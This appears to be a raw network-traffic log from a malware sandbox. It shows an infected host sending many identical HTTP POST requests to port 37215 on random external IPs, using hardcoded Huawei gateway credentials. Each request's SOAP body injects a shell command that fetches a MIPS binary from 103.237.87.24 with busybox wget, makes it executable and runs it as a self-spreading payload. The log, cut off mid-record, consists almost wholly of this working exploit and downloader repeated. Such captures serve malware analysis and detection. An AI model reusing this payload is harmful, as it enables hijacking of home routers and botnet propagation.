                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1695192.168.2.1352346157.103.78.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535774946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1696192.168.2.135358441.235.59.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535774946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1697192.168.2.1335852197.192.160.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535844088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1698192.168.2.1338900157.208.130.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535845995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1699192.168.2.1336104197.75.4.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535865068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1700192.168.2.135243041.255.254.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535912991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1701192.168.2.1359932160.199.198.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535916090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1702192.168.2.1348626122.64.38.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535923004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1703192.168.2.1350444197.11.80.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535989046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1704192.168.2.1357472157.175.56.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535989046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 